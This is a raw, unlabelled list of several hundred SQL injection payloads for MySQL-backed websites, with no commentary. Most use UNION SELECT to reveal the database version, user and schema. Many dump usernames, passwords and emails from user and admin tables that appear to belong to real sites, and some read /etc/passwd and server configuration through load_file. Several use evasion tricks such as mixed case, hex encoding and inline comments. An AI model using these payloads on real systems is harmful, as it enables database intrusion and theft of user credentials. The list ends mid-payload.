1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418 /* -1 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,database(),29,user(),31,32,33,34,35,36,37,38,39,40,41 -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a3a,id,emp_id,uname,passwd,email,team,level,status,lastlogin,logincount),25,26,27 from authuser limit 3,1 -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),version(),database(),@@version_compile_os) -- 1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 LIMIT 1,1-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(char(32,45,32),version(),user(),database()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,unhex(hex(TABLE_NAME)),25,26,27,28 from INFORMATION_SCHEMA.TABLES/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from dbo_tblKABranches -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,database(),26,user(),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/* 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2f,version(),user(),database())-- -1 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),23,24,25 -- -1 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat(name,0x3a,pass,0x0a),23,24,25 from lm_users -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30 -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,version(),database(),user()),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70/* -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,table_name,22 from information_schema.tables limit 0,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24 from company/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x203a20,email,pass),21,22,23,24,25,26,27,28,29 from jobsmarket_spb.users 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29-- 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version() limit 1,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(0x3c62207374796c653d22636f6c6f723a20234138413841383b20666f6e742d73697a653a2032307078223e44423a20,database(),0x3c6272202f3e4c6f67696e3a20,user(),0x3c6272202f3e4d7953514c3a20,version(),0x3c6272202f3e3c2f623e),20,21,22/* -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3A,version(),user(),database()),20,21,22,23,24,25,26,27,28,29,30,31,32-- 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),19,20 LIMIT 1,1/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(VERSION(),0x3a,USER(),0x3a,DATABASE()),19/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_Ws(0x3a,user(),database(),version()),19,20,21,22,23,24-- 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,user(),database(),version()),19,20,21,22,23,24,25,26,27 -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from user/ -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,load_file('/home'),19,20,21,22,23,24/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/ be_users -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(login,0x3a,password,0x3a,email),18 from user/* 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,login,pass),18,19,20,21,22,23,24,25 from gbusers limit 0,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,version(),database(),user()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,version(),user(),database(),0x202020202a2623313038303b2623313037363b2623313037373b2623313039303b202623313039323b2623313038303b2623313038333b2623313130303b2623313039303b2623313038383b2623313037323b2623313039343b2623313038303b2623313130333b2066726f6d2028),18,19,20,21,22/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(version())),18,19,20,21,22,23,24,25,26,27,28,29,30,31/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user(),0x3a,version(),0x3a,database()),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from INFORMATION_SCHEMA.COLUMNS-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from news/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26 -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,AES_DECRYPT(AES_ENCRYPT(DATABASE(), 0x71),0x71),16,17,18,19/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(char(64,64),convert(column_name using latin1),char(64,64)) from information_schema.columns where table_name=0x416363657373 limit 0,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(database(),char(58),user(),char(58),version()),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,nic,upass,adm),16,17,18,19,20,21,22,23,24,25,26,27,28 from user where adm=1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),database(),version()),16,17,18 1' Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24 from information_schema.tables limit 58,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,version()/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version(),0x3a,database()),15,16,17,18,19/* -1) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from information_schema.columns/* -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary))/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,mail,psw),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 from elcom_users/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),15,16,17,18,19,20,21,22,23,24,25-- 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()) -- -1 UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()) from adm_user -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,convert(database(),char),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,email,15,16,17,18,19,20,21,22,23,24,25 from users-- 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from news/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x3c62723e,concat_ws(0x203a3a3a20,username,email,password)),15,16,17,18,19,20,21,22,23 from 2030web.jos_users -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18 from INFORMATION_SCHEMA.TABLES limit 65,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,version(),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,database(),39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,current_date(),73,74,75,76,77/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,version() -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(email,0x3a,pwd),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users limit 17412,1 /* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(login,0x3a,pswd,0x3a,type),14,15,16,17,18,19,20,21,22,23,24,25,26 from mylover_data.members limit 20,29/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(nam,char(58),email,char(58),pass),14,15,16,17,18,19,20,21 from users limit 0,5/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x2a,email_address,username,password,user_level),14,15,16,17,18,19,20,21 FROM wap.users-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x2a,user(),version(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x2F,version(),database(),user()),14,15,16,17,18/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),database(),version())-- -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a ,user(),database(),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,group_concat(user_name,char(58),user_password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 from cop.cpg14x_users -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,table_name,14,AES_DECRYPT(AES_ENCRYPT(version(), 0x71),0x71),16,17,18,19 from information_schema.tables limit 1,1/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,2,13,14,15,16,17,18,19,20,21,22-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),13,14,15,16,17,18,19,20,21,22,23 -- -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat(username,0x3a,user_password),13,14,15,16,17,18 from hramevenkyaru_forum.phpbb_users limit 1,1 -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,username,password),13 from users limit 0,1-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,password,user()),13 from users-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15-- 1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13,14,15,16,17,18-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x40,table_schema,table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables limit 17,1-- -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,concat_ws(version(),user(),database()),13-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,convert(concat_ws(0x3a,version(),user(),database()) using latin1),13,14,15,16,17,18,19,20,21,22,23-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,convert(version() using latin1),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,32,32,33,34,35,36,37,38/* 1 union select 1,2,3,4,5,6,7,8,9,10,11 from news -1 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(concat(login,0x3a,password)),13 from kernel_users-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,id,password,user_name,15,16,17,18,19,20,21,22,23 from user limit 0,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,load_file(0x2f6574632f617061636865322f73697465732d656e61626c65642f3030302d64656661756c74)-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,VERSION(),13,14,15,16,17/* -1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,VERSION(),13,14,15,16,17,18/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24-- -1 union select 1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(version(),0),0),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,binary(concat_ws(0x3a,user(),version(),database())),12,13,14,15 -- -1 union select 1,2,3,4,5,6,7,8,9,10,concat(0x3a,login,passw),12,13,14,15 from admin/* -1 union select 1,2,3,4,5,6,7,8,9,10,concat(login,char(58),pass),12,13,14 from users limit 2,50/* -1 union select 1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15/* -1' union select 1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* -1 union select 1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23/* -1 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x203a20,username,user_password,user_email),12,13,14,15,16,17 from citroen_users limit 0,50/* -1 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -1' union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,username,password),12,13,14,15,16,17,18,19,20 from be_users /* -1 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,password,email) from user where id=2-- -1 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),database(),version()),12,13 -1 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database (),user()),12,13,14,15,16,17,18,19-- -1) union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22/* -1 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user(),@@version_compile_os,user,password) from mysql.user LIMIT 2,10-- -1 union select 1,2,3,4,5,6,7,8,9,10 from administration-- -1 union select 1,2,3,4,5,6,7,8,9,10 from mysql.user/* -1 union select 1,2,3,4,5, 6,7,8,9,10 from services.asp -1 union select 1,2,3,4,5,6,7,8,9,10 from ws_activv -1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(0x0b,username,0x3a3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin-- -1 union select 1,2,3,4,5,6,7,8,9,10,unhex(hex(concat_ws(0x3a,user(),version(),database()))),12,13,14,15,16,17,18,19,20,21- -1 union select 1,2,3,4,5,6,7,8,9,10,unhex(hex(concat_ws(0x3a,user(),version(),database()))),12,13,14,15,16,17,18,19,20,21-- -1 union select 1,2,3,4,5,6,7,8,9,10,user(),database(),13,14,15,16,17,18,19,20,21,22,23/* 1 union select 1,2,3,4,5,6,7,8,9,10,user(),database(),version(),14,15,16,17,18,19,20,21,22,23 from mysql.user/* -1 union select 1,2,3,4,5,6,7,8,9,10,version(),12-- -1 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18/* -1 union select 1,2,3,4,5,6,7,8,9,concat(login,0x3a,password),11,12,13,14,15 from users 1 union select 1,2,3,4,5,6,7,8,9,concat(name,0x3a3a,pass),11,12,13,14,15,16,17,18,19,20,21,22 from na_users limit 0,1 -1 union select 1,2,3,4,5,6,7,8,9,concat(user(),0x3a,database(),0x3a,version()),11,12/* -1' union select 1,2,3,4,5,6,7,8,9,concat(user,0x3d,password),11 from mysql.user/* -1 union select 1,2,3,4,5,6,7,8,9,concat(user(),char(58),password),11,12 from user/* -1 union select 1,2,3,4,5,6,7,8,9,concat(version()),10 -- -1 union select 1,2,3,4,5,6,7,8,9,CONCAT_WS(0x203A20, id,name,pass),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from na_users/* -1 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user())/* -1 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11,12,13,14,15/* -1 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,aes_decrypt(aes_encrypt(version(),0x71),0x71),aes_decrypt(aes_encrypt(database(),0x71),0x71),aes_decrypt(aes_encrypt(user(),0x71),0x71)),11,12,13/* -1 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,txt_username,txt_password,txt_email_address),11 from totalwar.tbl_login limit 1,1-- -1 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16,17,18,19-- 1 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11-- -1' union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -1 union select 1,2,3,4,5,6,7,8,9,concat_ws(version(),database(),user()),11,12,13,14,15,16,17,18,19/* -1 union select 1,2,3,4,5,6,7,8,9,database(),user(),12,version(),14,15,16,17,18,19,20/* -1 union select 1,2,3,4,5,6,7,8,9 from admin/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9 from news -1 union select 1,2,3,4,5,6,7,8,9 from regusers/* -1 union select 1,2,3,4,5,6,7,8,9,group_concat(fname,lname,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dating_membersu -- -1 union select 1,2,3,4,5,6,7,8,9,group_concat(username,0x3a,pw,0x0a),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from logme_users -- -1' Union select 1,2,3,4,5,6,7,8,9,group_concat(version(),user(),database()),11,12,13 from information_schema.tables -- -1 union select 1,2,3,4,5,6,7,8,9,load_file('/etc/passwd'),11,12,13/* -1 union select 1,2,3,4,5,6,7,8,9,password,11,12 from mysql.user/* -1 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13-- -1' /*!UNION*/ SELECT 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18 -- -1 union select 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),10,11,12,13,14,15,16,17,18,19/* -1 union select 1,2,3,4,5,6,7,8,concat(0x3a3a,convert(login using utf8),0x3a3a,password),10,11,12,13,14,15,16,17 from kf_user limit 0,20/* -1 union select 1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version())/* -1 union select 1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10/* -1 union select 1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1' union select 1,2,3,4,5,6,7,8,concat(name,' : ',password,' : ',email,' : ',icq,' : ',homepage),10,11,12,13 from users limit 100/* -1 union select 1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13/* -1 union select 1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15/* -1 union select 1,2,3,4,5,6,7,8,concat(version(),0x3a,user(),0x3a,database()),10,11,12,13,14/* -1 union select 1,2,3,4,5,6,7,8,concat(version(),char(58),user(),char(58),database()),10,11,12/* -1 union select 1,2,3,4,5,6,7,8,concat(version(),user(),database()),10,11-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x05,id,username,password,email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from t_user/* -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,LoginName,LoginPass,Email),10,11,12,13,14 from _tabUzivatele/* -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,username,password,password2),10,11,12,13,14 from tbl_member limit 0,1-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,user,pass),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from admin limit 0,1 -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),version(),user()),10,11,12,13,14,15-- -1' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10 -- 1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17/* 1 union select 1,2,3,4,5,6,7,8,concat_Ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17-- -1 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20 -- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from admin/* -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,USERNAME,PASSWORD,EMAIL),10,11,12,13,14,15 from USERS/* -1' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(), database()),10/* 1 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 -- -1' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()) -- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15/* 1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15,16,17,18-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23 from mysql.user limit 0,1-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13,14,15,16,17-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(0x3b20,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x203a20,id,fio,email,status,name,password),23,24,25,27 from login limit 0,50/* -1 union select 1,2,3,4,5,6,7,8,concat_ws(char(124),version(),database(),user()),10,11,12,13-- -1 union select 1,2,3,4,5,6,7,8,concat_ws(char(58),user_id,username,pword),10,11,12,13,14,15,16,17,18 from users/* -1 UNION SELECT 1,2,3,4,5,6,7,8,convert(concat_ws(0x3A,username,password) using latin1),10,11,12,13,14,15 from users/* -1' union select 1,2,3,4,5,6,7,8,convert(concat_ws(0x3b,user(),database(),version()) using cp1251),10,11/* -1' union select 1,2,3,4,5,6,7,8 from information_schema.tables -- -1 union select 1,2,3,4,5,6,7,8 from user -- -1 union select 1,2,3,4,5,6,7,8 from user/* -1 UNION SELECT 1,2,3,4,5,6,7,8 FROM w3t_Users/* -1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(schema_name SEPARATOR 0x0b),10,11,12,13,14,15,16,17,18,19 